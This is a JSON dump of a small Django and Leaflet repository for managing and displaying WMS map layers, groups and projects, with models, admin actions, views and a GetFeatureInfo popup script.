[ { "alpha_fraction": 0.821052610874176, "alphanum_fraction": 0.821052610874176, "avg_line_length": 47, "blob_id": "558064c90b9ab5333770e4af03e1a2f84cead5af", "content_id": "6404ab02914e4405fad74648c97a557c865fe21f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/maps/__init__.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "from django.contrib.admin import default_app_config\ndefault_app_config = 'maps.apps.MapsConfig'" }, { "alpha_fraction": 0.5631974339485168, "alphanum_fraction": 0.5707128047943115, "avg_line_length": 29.082191467285156, "blob_id": "ac379eacc6f70c7ed0d57291c551266eaff7e83f", "content_id": "35d78674595eefb948607c1c519c20ba4e5c0079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4391, "license_type": "no_license", "max_line_length": 89, "num_lines": 146, "path": "/maps/static/js/betterwms.js", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "/**\n * \n */\nL.TileLayer.BetterWMS = L.TileLayer.WMS.extend({\n \n\t/**\n\t * creates an XSLTProcessor and loads stylesheet\n\t */\n loadStylesheet: function(url) {\n \tlet http = new XMLHttpRequest();\n\thttp.open(\"GET\",url,false);\n\thttp.send(\"\");\n\tlet xsl = http.responseXML;\n//\tconsole.debug(xsl);\n\tlet processor = new XSLTProcessor();\n\tprocessor.importStylesheet(xsl);\n\treturn processor;\n },\n \n onAdd: function (map) {\n // Triggered when the layer is added to a map.\n L.TileLayer.WMS.prototype.onAdd.call(this, map);\n if (this.wmsParams.clickable) {\n \tmap.on('click', this.getFeatureInfo, this);\n }\n },\n \n onRemove: function (map) {\n // Triggered when the layer is removed from a map.\n L.TileLayer.WMS.prototype.onRemove.call(this, map);\n if (this.wmsParams.clickable) {\n \tmap.off('click', this.getFeatureInfo, this);\n }\n },\n \n formatFeatureInfoResponseXSLT: function(response) {\n\t // format FeatureInfoResponse using a stylesheet\n\t if (this.xsltProcessor === undefined) {\n\t \tthis.xsltProcessor = this.loadStylesheet(\"/static/xsl/getfeatureinforesponse.xsl\");\n\t }\n\t\tlet doc = this.xsltProcessor.transformToDocument(response);\n\t\treturn doc.firstChild.innerHTML;\n\t },\n\n formatFeatureInfoResponse: function(response) {\n // customized formatting of FeatureResponse\n let props = this.wmsParams.propertyName;\n if (props)\n \t// use specified properties only\n \tprops = props.split(',');\n // use displayname instead of layer name\n let displayName = this.wmsParams.displayName;\n const resp= xml2json.docToJSON(response);\n let html = '<html><body><table>';\n let itemCount = 0;\n if (resp.tagName === 'GetFeatureInfoResponse') {\n \tif (resp.children) {\n\t \tresp.children.forEach(layer => {\n\t \t\tlet layerName = layer.attr.name;\n\t \t\tif (layerName === this.wmsParams.layers)\n\t \t\t\t// use provided display name (wmslayer's title)\n\t \t\t\tlayerName = displayName;\n\t\t\t\thtml += `<tr><th colspan=\"3\">${layerName}</th></tr>`;\n\t \t\tif (layer.children) {\n\t\t \t\tlayer.children.forEach(item => {\n\t\t \t\t\tif (item.tagName === 'Attribute') {\n\t\t \t\t\t\t// Raster Info: single attribute without feature(s)\n\t \t\t\t\t\tconst value = item.attr.value;\n\t \t\t\t\t\titemCount++;\n\t \t\t\t\t\thtml += `<tr>\n\t\t \t\t\t\t\t<td></td>\n\t\t \t\t\t\t\t<td>${name}</td>\n\t\t \t\t\t\t\t<td>${value}</td>\n\t\t \t\t\t\t\t</tr>`\n\t\t \t\t\t}\n\t\t 
\t\t\telse if (item.tagName === 'Feature') {\n\t\t \t\t\t\t// Vector Info (features)\n\t\t\t \t\t\tconst id = item.attr.id;\n\t\t\t \t\t\tif (item.children) {\n\t\t\t \t\t\t\titem.children.forEach(property => {\n\t\t\t\t \t\t\t\tif (property.tagName === 'Attribute') {\n\t\t\t\t \t\t\t\t\tconst name = property.attr.name;\n\t\t\t\t \t\t\t\t\tif (!props || props.includes(name)) {\n\t\t\t\t\t \t\t\t\t\tconst value = property.attr.value;\n\t\t\t\t\t \t\t\t\t\t// console.info(`layer=${layerName}, feature=${id}, ${name}=${value}`);\n\t\t\t\t\t \t\t\t\t\titemCount++;\n\t\t\t\t\t \t\t\t\t\thtml += `<tr>\n\t\t\t\t\t \t\t\t\t\t<td>${id}</td>\n\t\t\t\t\t \t\t\t\t\t<td>${name}</td>\n\t\t\t\t\t \t\t\t\t\t<td>${value}</td>\n\t\t\t\t\t \t\t\t\t\t</tr>`\n\t\t\t\t \t\t\t\t\t}\n\t\t\t\t \t\t\t\t}\n\t\t\t\t \t\t\t})\n\t\t\t \t\t\t}\n\t\t \t\t\t}\n\t\t \t\t})\n\t \t\t}\n\t \t})\n \t}\n }\n html += '</table></body></html>';\n return itemCount? html: null;\n },\n\n getFeatureInfo: function(evt) {\n const params = this.getFeatureInfoParams(evt.latlng);\n $.get(this._url,params).then(response => {\n \tconst html = this.formatFeatureInfoResponse(response);\n\t if (html) {\n\t \tL.popup({ maxWidth: 800})\n\t\t .setLatLng(evt.latlng)\n\t\t .setContent(html)\n\t\t .openOn(this._map); \t\n\t }\n\t});\n },\n\n getFeatureInfoParams: function (latlng) {\n // Construct parameters object for a GetFeatureInfo request at a given point\n\tconst lat = latlng.lat;\n\tconst lon = latlng.lng;\n const params = {\n request: 'GetFeatureInfo',\n service: 'WMS',\n srs: 'EPSG:4326',\n version: '1.3.0', \n bbox: [lat, lon, lat + 0.00001, lon + 0.00001].join(','),\n height: 100,\n width: 100,\n i: 0,\n j: 0,\n layers: this.wmsParams.layers,\n query_layers: this.wmsParams.layers,\n info_format: 'text/xml',\n };\n \n if ('propertyName' in this.wmsParams)\n \tparams['propertyName'] = this.wmsParams.propertyName;\n return params; \n }\n});\n\nL.tileLayer.betterWms = function (url, options) {\n return new L.TileLayer.BetterWMS(url, options); \n};" }, { "alpha_fraction": 0.5234899520874023, "alphanum_fraction": 0.5755033493041992, "avg_line_length": 24.913043975830078, "blob_id": "7027c51f4ff8cab2aa486c05f671c0759fbb0c7a", "content_id": "5488f12c78875002a335b8f48045ca80230ffb5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 596, "license_type": "no_license", "max_line_length": 92, "num_lines": 23, "path": "/maps/migrations/0016_auto_20191030_1446.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.5 on 2019-10-30 14:46\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('maps', '0015_auto_20190830_0831'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='group',\n name='layers',\n field=models.ManyToManyField(blank=True, to='maps.Layer'),\n ),\n migrations.AlterField(\n model_name='layer',\n name='groups',\n field=models.ManyToManyField(blank=True, to='maps.Group', verbose_name='group'),\n ),\n ]\n" }, { "alpha_fraction": 0.6207212805747986, "alphanum_fraction": 0.6216381192207336, "avg_line_length": 35.76404571533203, "blob_id": "aca19d0c59d1134aae1919966f18d255e9326107", "content_id": "98c699328976f778b9105c66e8925345b3a92ef9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3272, "license_type": "no_license", "max_line_length": 106, "num_lines": 89, "path": "/maps/admin.py", "repo_name": "acaciawater/maps", 
"src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.admin.decorators import register\nfrom .models import Map, Layer\nfrom django.contrib import messages\nfrom maps.models import Project, Timeseries, Group, Mirror\nfrom maps.actions import update_mirror\nfrom maps.forms import LayerPropertiesForm\nfrom django.shortcuts import render\nfrom django.utils.translation import gettext_lazy as _\n\n@register(Group)\nclass GroupAdmin(admin.ModelAdmin):\n model = Group\n fields = (('name','map'),('layers',))\n list_display = ('name', 'map', 'layer_count')\n list_filter = ('map',)\n filter_horizontal = ('layers',)\n \n\n@register(Layer)\nclass LayerAdmin(admin.ModelAdmin):\n model = Layer\n fields = (('layer','map'),('groups',),\n ('order','visible','use_extent'),\n ('opacity','transparent'),\n ('minzoom','maxzoom'),\n ('properties','clickable'),\n 'stylesheet',\n ('download_url','allow_download'),\n )\n list_filter = ('visible','map','groups','layer__server','allow_download')\n list_display = ('layer','map','group_names','extent','use_extent')\n search_fields = ('layer__title',)\n filter_horizontal = ('groups',)\n actions = ['update_layer_properties']\n \n def update_layer_properties(self, request, queryset):\n if 'apply' in request.POST:\n form = LayerPropertiesForm(request.POST)\n if form.is_valid():\n # filter null items from cleaned_data\n data = {k:v for k,v in form.cleaned_data.items() if v is not None}\n ret = queryset.update(**data)\n messages.success(request, _('Properties updated successfully for {} layers').format(ret))\n else:\n # warn about the problem\n messages.error(request, _('Properties were not updated: error in form'))\n elif 'cancel' in request.POST:\n messages.warning(request,_('Action to update layer properties was cancelled'))\n else:\n form = LayerPropertiesForm()\n return render(request, 'maps/layer_properties.html', \n context = {'form': form, 'meta': self.model._meta, 'queryset': queryset})\n\n update_layer_properties.short_description = _('Update layer properties') \n \nclass LayerInline(admin.TabularInline):\n model = Layer\n fields = ('layer', 'order', 'visible', 'clickable', 'allow_download', 'opacity')\n extra = 0\n \n def get_queryset(self, request):\n return admin.TabularInline.get_queryset(self, request).order_by('order').prefetch_related('layer')\n \n@register(Map)\nclass MapAdmin(admin.ModelAdmin):\n model = Map\n inlines = [LayerInline]\n actions = ['update_extent']\n \n def update_extent(self, request, queryset):\n count = 0\n for m in queryset:\n m.set_extent()\n count+=1\n messages.success(request, _('{} extents were updated sucessfully.').format(count))\n \n@register(Mirror)\nclass MirrorAdmin(MapAdmin):\n model = Mirror\n actions = [update_mirror]\n \n@register(Timeseries)\nclass TimeseriesAdmin(admin.ModelAdmin):\n model = Timeseries\n \n@register(Project)\nclass ProjectAdmin(admin.ModelAdmin):\n model = Project\n" }, { "alpha_fraction": 0.6902173757553101, "alphanum_fraction": 0.70652174949646, "avg_line_length": 31.41176414489746, "blob_id": "2ae130d1a66508e9b718ef52d6b1143a345dd0bf", "content_id": "603c5393cced7c74727077ca2d002f6946705779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 76, "num_lines": 17, "path": "/maps/actions.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 28, 2019\n\n@author: theo\n'''\nfrom django.utils.translation import ugettext_lazy as 
_\nfrom django.contrib import messages\n\ndef update_mirror(modeladmin, request, queryset):\n numLayers = 0\n numServers = 0\n for mirror in queryset:\n numLayers += mirror.update_layers()\n numServers += 1\n messages.success(request, _('{} servers processed.').format(numServers))\n messages.success(request, _('{} layers discovered.').format(numLayers))\nupdate_mirror.short_description=_('update layer list of selected mirrors')\n\n" }, { "alpha_fraction": 0.7765957713127136, "alphanum_fraction": 0.8085106611251831, "avg_line_length": 93, "blob_id": "a8dc3e9d095a318be1dcb61778fd93782fcbb090", "content_id": "1ce0ef4aa75b87308f59da7ae7f5e2596d87168f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 94, "license_type": "no_license", "max_line_length": 93, "num_lines": 1, "path": "/todo.txt", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "for info popups: https://astuntechnology.github.io/osgis-ol3-leaflet/leaflet/05-WMS-INFO.html\n" }, { "alpha_fraction": 0.5520833134651184, "alphanum_fraction": 0.7083333134651184, "avg_line_length": 18.200000762939453, "blob_id": "f2b87279a84b28be827a8ad16a5359b4c3ac0f64", "content_id": "882c48e30ce932fbcb6202e92eedfe2d205805ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 96, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/requirements.txt", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "Django==2.2.5\nOWSLib==0.17.1\nPillow==6.0.0\ndjango-cors-headers==3.0.1\ndjango-debug-toolbar==2.0\n" }, { "alpha_fraction": 0.7504798173904419, "alphanum_fraction": 0.7658349275588989, "avg_line_length": 33.400001525878906, "blob_id": "1f80c40e7ce5e4e67b4c01d5b6be2957b06916e2", "content_id": "ab827b6ba994f31957a54df48e577989678c58af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/maps/forms.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 29, 2019\n\n@author: theo\n'''\nfrom django.forms.forms import Form\nfrom django.forms import fields\n\nclass LayerPropertiesForm(Form):\n visible = fields.NullBooleanField(required=False)\n use_extent = fields.NullBooleanField(required=False)\n clickable = fields.NullBooleanField(required=False)\n transparent = fields.NullBooleanField(required=False)\n opacity = fields.DecimalField(max_digits=4, decimal_places=1,required=False)\n allow_download = fields.NullBooleanField(required=False)\n \n" }, { "alpha_fraction": 0.6076655983924866, "alphanum_fraction": 0.6146117448806763, "avg_line_length": 36.13364028930664, "blob_id": "15e852b97764674bfa84f9b348b1a4b973de9b42", "content_id": "f53960cc04be17d2c4ca639f249673cb8f6a4c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8062, "license_type": "no_license", "max_line_length": 174, "num_lines": 217, "path": "/maps/models.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on May 20, 2019\n\n@author: theo\n'''\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom wms.models import Layer as WMSLayer, Server\nfrom django.utils.text import slugify\nimport json\nfrom django.dispatch import receiver\nfrom django.db.models.signals import pre_save\nimport collections\nfrom django.urls.base import 
reverse\n\nclass MapsModel(models.Model):\n '''\n Abstract base model that adds 'app_label' and 'model_name' properties to model for use with admin:admin_urls template tag\n '''\n @property\n def app_label(self):\n return self._meta.app_label\n\n @property\n def model_name(self):\n return self._meta.model_name\n\n class Meta:\n abstract = True\n app_label = 'maps'\n \nclass Timeseries(MapsModel):\n name = models.CharField(_('name'),max_length=100,unique=True)\n server = models.URLField(_('server'))\n locations = models.CharField(_('locations'),max_length=100)\n popup = models.CharField(_('popup'),max_length=100)\n chart = models.CharField(_('chart'),max_length=100)\n\n def __str__(self):\n return self.name\n \n class Meta:\n verbose_name_plural = 'Timeseries'\n \nclass Map(MapsModel):\n \n name = models.CharField(_('name'),max_length=100,unique=True)\n bbox = models.CharField(_('extent'),max_length=100,null=True,blank=True)\n\n def layers(self):\n retval = collections.OrderedDict()\n for layer in self.layer_set.order_by('order'):\n retval[layer.layer.title]=layer.asjson()\n return json.dumps(retval)\n\n def groups(self):\n groups = {}\n\n ungrouped = self.layer_set.filter(groups__isnull=True).order_by('order').prefetch_related('groups')\n if ungrouped:\n groups['Layers'] = collections.OrderedDict()\n for layer in ungrouped:\n groups['Layers'][layer.layer.title]=layer.asjson()\n \n for group in self.group_set.order_by('name').prefetch_related('layers'):\n groups[group.name] = collections.OrderedDict()\n for layer in group.layers.order_by('order'):\n groups[group.name][layer.layer.title]=layer.asjson()\n\n return json.dumps(groups)\n \n \n def get_extent(self):\n map_extent = []\n for layer in self.layer_set.exclude(use_extent=False):\n bbox = layer.extent()\n if bbox:\n if map_extent:\n map_extent[0] = min(bbox[0], map_extent[0])\n map_extent[1] = min(bbox[1], map_extent[1])\n map_extent[2] = max(bbox[2], map_extent[2])\n map_extent[3] = max(bbox[3], map_extent[3])\n else:\n map_extent = list(bbox)\n return map_extent\n \n def set_extent(self):\n ext = self.get_extent()\n self.bbox = ','.join(map(str,ext))\n self.save(update_fields=('bbox',))\n return ext\n \n def extent(self):\n if not self.bbox:\n return self.set_extent()\n else:\n return list(map(float,self.bbox.split(',')))\n \n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('map-detail', args=[self.pk]) \n\nclass Mirror(Map):\n\n server = models.ForeignKey(Server,on_delete=models.CASCADE)\n \n def update_layers(self):\n # update layer list on WMS server\n self.server.updateLayers()\n \n # update layer list of this map\n self.layer_set.all().delete()\n index = 0\n for layer in self.server.layer_set.all():\n self.layer_set.create(layer=layer,order=index,use_extent=False)\n index += 1\n return index\n\nclass Group(models.Model):\n name = models.CharField(_('group'), max_length=100)\n map = models.ForeignKey(Map,on_delete=models.CASCADE)\n layers = models.ManyToManyField('maps.Layer',blank=True)\n\n def layer_count(self):\n return self.layers.count()\n \n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = _('group')\n verbose_name_plural = _('groups')\n unique_together = ('name','map')\n \nclass Layer(MapsModel): \n map = models.ForeignKey(Map, models.CASCADE, verbose_name=_('map'))\n layer = models.ForeignKey(WMSLayer, models.CASCADE, verbose_name=_('WMS layer'),null=True)\n groups = models.ManyToManyField(Group, blank=True, verbose_name=_('group'), through='maps.group_layers')\n 
order = models.SmallIntegerField(_('order'))\n visible = models.BooleanField(_('visible'), default=True) \n visible.boolean = True\n format = models.CharField(_('format'), max_length=50,default='image/png')\n minzoom = models.SmallIntegerField(_('minzoom'),null=True, blank=True)\n maxzoom = models.SmallIntegerField(_('maxzoom'),null=True, blank=True)\n transparent = models.BooleanField(_('transparent'), default=True)\n transparent.Boolean = True\n opacity = models.DecimalField(_('opacity'), max_digits=4, decimal_places=1, default=1.0)\n\n use_extent = models.BooleanField(default=True,verbose_name=_('Use extent'))\n clickable = models.BooleanField(default=False,verbose_name=_('clickable'),help_text=_('show popup with info when layer is clicked'))\n clickable.boolean = True\n properties = models.CharField(_('properties'), max_length=200, null=True, blank=True, help_text=_('comma separated list of properties to display when layer is clicked')) \n\n allow_download = models.BooleanField(default=False,verbose_name=_('downloadable'), help_text=_('user can download this layer'))\n allow_download.Boolean=True\n download_url = models.URLField(_('download url'),null=True,blank=True,help_text=_('url for download of entire layer'))\n stylesheet = models.URLField(_('stylesheet'),null=True, blank=True, help_text=_('url of stylesheet for GetFeatureInfo response'))\n\n def group_names(self):\n return ','.join(map(str,self.groups.values_list('name',flat=True)))\n\n def extent(self):\n return self.layer.extent()\n \n def asjson(self):\n '''\n returns json dict for L.tileLayer.wms\n '''\n ret = {\n 'url': self.layer.server.url,\n 'layers': self.layer.layername,\n 'format': self.format,\n 'visible': self.visible,\n 'transparent': self.transparent,\n 'opacity': float(self.opacity),\n 'clickable': self.clickable,\n 'displayName': self.layer.title,\n }\n if self.properties:\n ret['propertyName'] = self.properties\n if self.allow_download and self.download_url:\n ret['downloadUrl'] = self.download_url\n if self.stylesheet:\n ret['stylesheet'] = self.stylesheet\n if self.minzoom:\n ret['minZoom'] = self.minzoom\n if self.maxzoom:\n ret['maxZoom'] = self.maxzoom\n try:\n ret['legend'] = self.layer.legend_url()\n except:\n pass #ret['legend'] = ''\n return ret\n\n def __str__(self):\n return '{}'.format(self.layer)\n\nclass Project(MapsModel):\n slug = models.SlugField(help_text=_('Short name for url'))\n name = models.CharField(_('name'),max_length=100,unique=True,help_text=_('Descriptive name of project'))\n title = models.CharField(_('tile'),max_length=100,help_text=_('Title on browser page'))\n logo = models.ImageField(_('logo'),upload_to='logos',null=True,blank=True)\n map = models.ForeignKey(Map,models.SET_NULL,null=True,blank=True,verbose_name=_('map'))\n timeseries = models.ForeignKey(Timeseries,models.SET_NULL,null=True,blank=True,verbose_name=_('timeseries'))\n \n def get_absolute_url(self):\n return reverse('project-detail', args=[self.pk]) \n\n def __str__(self):\n return self.name\n \n@receiver(pre_save, sender=Project)\ndef project_save(sender, instance, **kwargs):\n if instance.slug is None:\n instance.slug = slugify(instance.name)\n " }, { "alpha_fraction": 0.6343467831611633, "alphanum_fraction": 0.6433853507041931, "avg_line_length": 30.179487228393555, "blob_id": "c00fb23437d47e3bc56bf8906649b1939e478057", "content_id": "23d353f7049a6716a1e39a0345f41eb024e946ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1217, "license_type": 
"no_license", "max_line_length": 141, "num_lines": 39, "path": "/maps/views.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on May 15, 2019\n\n@author: theo\n'''\nfrom django.views.generic.base import TemplateView\nfrom django.conf import settings\nfrom .models import Project, Map\nfrom django.views.generic.detail import DetailView\nimport json\n\nclass MapDetailView(DetailView):\n model = Map\n \n def getMap(self):\n return self.get_object() \n \n def get_context_data(self, **kwargs):\n context = TemplateView.get_context_data(self, **kwargs)\n context['api_key'] = settings.GOOGLE_MAPS_API_KEY\n context['options'] = {'zoom': 12, 'center': [52,5]}\n mapObject = self.getMap()\n context['map'] = mapObject\n context['extent'] = mapObject.extent()\n return context\n \nclass ProjectDetailView(MapDetailView):\n model = Project\n\n def getMap(self):\n return self.get_object().map\n \n def get_context_data(self, **kwargs):\n context = MapDetailView.get_context_data(self, **kwargs)\n project = self.get_object()\n if project.timeseries:\n series = project.timeseries\n context['series'] = json.dumps({'server': series.server, 'items': series.locations, 'popup': series.popup, 'chart':series.chart})\n return context\n\n" }, { "alpha_fraction": 0.6149425506591797, "alphanum_fraction": 0.6494252681732178, "avg_line_length": 14.818181991577148, "blob_id": "b1da110ecd6190a3ead1e6fd1e4ad2ab074d9108", "content_id": "210335e23e22e1bba352d81dd9f9742808faeb69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/maps/apps.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "'''\nCreated on Jun 21, 2019\n\n@author: theo\n'''\nfrom django.apps import AppConfig\n\nclass MapsConfig(AppConfig):\n name = 'maps'\n label = 'maps'\n verbose_name = 'maps'\n" } ]
11
Ansh-Rathod/marvel-api
https://github.com/Ansh-Rathod/marvel-api
5efbae387ac7a7b922bdc9b587f63f005fb035b7
55cb6ca31747ffb98d9e09575b52e658d60fe889
0747ab68848520676670c5011a7b5acdf0018331
refs/heads/main
2023-02-20T05:25:35.133118
2021-01-24T10:01:59
2021-01-24T10:01:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6441717743873596, "alphanum_fraction": 0.6533742547035217, "avg_line_length": 23.789474487304688, "blob_id": "c9f298bec30f79686d33c078b04ba4d8584e720e", "content_id": "e3ef65a1c59f1a068e8821c7af337144e41f0735", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 978, "license_type": "no_license", "max_line_length": 82, "num_lines": 38, "path": "/marvel_api/static/js/main.js", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "window.onscroll = function() {\r\n scroll()\r\n}\r\n\r\nfunction scroll() {\r\n var navbar = document.querySelector('.navbar')\r\n if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) {\r\n navbar.classList.add('shado')\r\n } else {\r\n navbar.classList.remove('shado')\r\n }\r\n}\r\nwindow.addEventListener('load', function() {\r\n var preloder = document.querySelector(\".pre\")\r\n preloder.classList.add('finish')\r\n document.body.style.overflow = 'auto'\r\n\r\n})\r\nconst menu = document.querySelector(\".menu\")\r\nconst menu1 = document.querySelector(\".menu1\")\r\n\r\nconst nav = document.querySelector(\".nav\")\r\nlet isActive = true\r\n\r\nmenu.addEventListener(\"click\", function() {\r\n\r\n nav.classList.remove('finish')\r\n menu.classList.add('finish')\r\n menu1.classList.remove('finish')\r\n\r\n\r\n\r\n})\r\nmenu1.addEventListener(\"click\", function() {\r\n nav.classList.add('finish')\r\n menu.classList.remove('finish')\r\n menu1.classList.add('finish')\r\n})" }, { "alpha_fraction": 0.46165505051612854, "alphanum_fraction": 0.5392543077468872, "avg_line_length": 43.84722137451172, "blob_id": "bbfd6560b212c3fc951924a9a064b1c28cddb136", "content_id": "a18f15930fb32ea134852b3e28be676323e3bfa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 3299, "license_type": "no_license", "max_line_length": 371, "num_lines": 72, "path": "/marvel_api/templates/comic.html", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "{% extends 'inc/_layout.html' %} {% block body %}{% include 'inc/_navbar.html'%}\r\n<div class=\"jumbotron\">\r\n <h1>Search Comics</h1><br>\r\n <form action=\"/comicsearch\" method=\"POST\" class=\"form-group\">\r\n <input type=\"text\" name=\"Search\" placeholder=\"Search Marvel Comics...\" class=\"form-control\">\r\n <button type=\"submit\" class=\"btn btn-primary\">Search</button>\r\n </form><br>\r\n <hr><br>\r\n <h3>Search With Year</h3><br>\r\n <hr><br>\r\n <form action=\"/comicsearchyear\" method=\"POST\" class=\"form-group\">\r\n <input type=\"text\" name=\"Search\" placeholder=\"Search Marvel Comics...\" class=\"form-control\">\r\n <select name=\"Year\" placeholder=\"Search year...\" class=\"form-control\">\r\n <option value=\"2020\">2020</option>{% for year in range(1950,2020)%}\r\n <option value=\"{{year}}\">{{year}}</option>{% endfor%}</select>\r\n <button type=\"submit\" class=\"btn btn-primary\">Search</button>\r\n </form>\r\n\r\n</div>\r\n\r\n<div class=\"comics\">\r\n <h1 class=\"heading\">Comics</h1>\r\n <div class=\"comic_container-one\"> {% for comic in comics.data.results %}\r\n <div class=\"comic_container_inner\">\r\n <a href=\"/comics/{{comic.id}}\"><img src=\"{{comic.thumbnail.path}}.{{comic.thumbnail.extension}}\" alt=\"\" class=\"cover\"></a>\r\n <div class=\"description\">\r\n <h4 style=\"text-align:center;margin-bottom:12px\">{{comic.title}}</h4>\r\n <hr><br>\r\n <h4 style=\"float:left;border:1px solid 
#ddd;\">{{comic.prices[0].price}} <svg xmlns=\"http://www.w3.org/2000/svg\" width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><title>ic_attach_money_24px</title>\r\n <g fill=\"#e83030\">\r\n <path d=\"M11.8 10.9c-2.27-.59-3-1.2-3-2.15 0-1.09 1.01-1.85 2.7-1.85 1.78 0 2.44.85 2.5 2.1h2.21c-.07-1.72-1.12-3.3-3.21-3.81V3h-3v2.16c-1.94.42-3.5 1.68-3.5 3.61 0 2.31 1.91 3.46 4.7 4.13 2.5.6 3 1.48 3 2.41 0 .69-.49 1.79-2.7 1.79-2.06 0-2.87-.92-2.98-2.1h-2.2c.12 2.19 1.76 3.42 3.68 3.83V21h3v-2.15c1.95-.37 3.5-1.5 3.5-3.55 0-2.84-2.43-3.81-4.7-4.4z\"></path>\r\n </g>\r\n</svg></h4><br><br>\r\n <center><a href=\"{{comic.urls[0].url}}\" class=\"btn\" style=\"padding:8px 30px ;\">Buy Now</a></center>\r\n </center><br>\r\n </div>\r\n </div>{% endfor %}</div><br></div>\r\n<div class=\"center\">\r\n <div class=\"pagination\" style=\"margin-top:50px\">\r\n {%if prev == -1 %}{% else %}\r\n <a href=\"/comics/page/{{prev}}\" class=\"active\">Previous page</a>{% endif %} {% if number == 15 %}{% else %}\r\n <a href=\"/comics/page/{{number}}\" class=\"active\">Next page</a>{% endif %}\r\n </div>\r\n</div>\r\n<div class=\"footer\">\r\n <ul>\r\n <a href=\"#\">\r\n <li>Blog</li>\r\n </a>\r\n <a href=\"#\">\r\n <li>RSS</li>\r\n </a>\r\n <a href=\"#\">\r\n <li>instagram</li>\r\n </a>\r\n <a href=\"https://github.com/Appii00\">\r\n <li>GitHub</li>\r\n </a>\r\n <a href=\"https://developer.marvel.com/docs#!/public/getCreatorCollection_get_12\">\r\n <li>API</li>\r\n </a>\r\n\r\n </ul>\r\n <br>\r\n <hr>\r\n <br>\r\n <a>Made by Ansh Rathod.</a><br>\r\n <a>Code created in Python flask app</a><br>\r\n <a>Based on coustum css. Icons from Font Awesome. Web fonts from Google.</a>\r\n <br><br>\r\n</div>\r\n{%endblock%}" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6678779125213623, "avg_line_length": 36.57944107055664, "blob_id": "e28d73e11c25567c83c6505989d354d378eaf70d", "content_id": "16287afd60a2f67c9556df4599db5b545db9f0c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4128, "license_type": "no_license", "max_line_length": 193, "num_lines": 107, "path": "/marvel_api/app.py", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "from flask import *\r\nimport requests\r\nimport os\r\n\r\napp = Flask(__name__, template_folder='./templates')\r\n\r\n\r\[email protected]_processor\r\ndef override_url_for():\r\n return dict(url_for=dated_url_for)\r\n\r\n\r\ndef dated_url_for(endpoint, **values):\r\n if endpoint == 'static':\r\n filename = values.get('filename', None)\r\n if filename:\r\n file_path = os.path.join(app.root_path, endpoint, filename)\r\n values['q'] = int(os.stat(file_path).st_mtime)\r\n return url_for(endpoint, **values)\r\n\r\n\r\[email protected]('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\[email protected]('/search', methods=['POST', 'GET'])\r\ndef search():\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/characters?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n if request.method == 'POST':\r\n if request.form['Search'] == '':\r\n print('please enter')\r\n else:\r\n Search = request.form['Search']\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/characters?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&nameStartsWith='+Search)\r\n return render_template('search.html', result=json.loads(r.text))\r\n\r\n return render_template('search.html', 
